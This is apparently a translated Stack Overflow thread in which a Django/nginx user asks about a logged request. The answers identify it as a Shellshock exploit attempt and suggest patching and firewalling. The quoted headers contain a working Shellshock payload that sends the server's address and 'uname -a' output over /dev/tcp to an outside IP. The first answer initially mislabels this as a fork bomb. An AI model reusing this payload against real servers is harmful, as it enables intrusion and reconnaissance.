【问题标题】:Django possible security attackDjango 可能的安全攻击
【发布时间】:2015-06-22 20:19:03
【问题描述】:

我已设置 django 以在任何请求失败时通过电子邮件提醒我,并且我不断收到此电子邮件:

Referrer: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi  > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
Requested URL: /cgi-bin/index.cgi
User agent: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi  > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
IP address: 127.0.0.1

这是什么意思?我应该打扰吗?

我正在使用 nginx、ubuntu、gunicorn。

【问题讨论】:

  • 这绝对是一次攻击,但这并不意味着它是成功的。提高安全性的一个很好的起点是设置 iptables(防火墙)和 fail2ban 等工具。您可能会在 security.stackexchange.com 上得到更好的回应。

标签: django security nginx


【解决方案1】:

这看起来像是在尝试fork bomb

() { :;};

幸运的是,如果您的服务器在发送后仍在运行,则意味着它正在被清理或忽略。


正如@TheGreatContini 指出的那样,这是actually an attempted Shellshock attack。这让我的回答有点不安全。值得确保您的服务器已完全修补并保持最新状态,并检查任何传出流量以确保您没有受到影响。

【讨论】:

  • 谢谢@lego-stormtroopr。是的,服务器仍在运行,所以它失败了。
  • 我认为这是对shell Shock漏洞的尝试! blog.cloudflare.com/inside-shellshock
  • 同意您对帖子的更新。原始发布者应该测试他的服务器,看看他是否容易受到外壳冲击。如果是,那么他有一个非常严重的问题(一旦黑客进入,他们可能已经获取了您的数据并设置了后门,以便他们可以随时回来)。
【解决方案2】:

这是对shell shock漏洞的利用尝试。

【讨论】:

猜你喜欢
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 2011-09-25
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
相关资源
最近更新 更多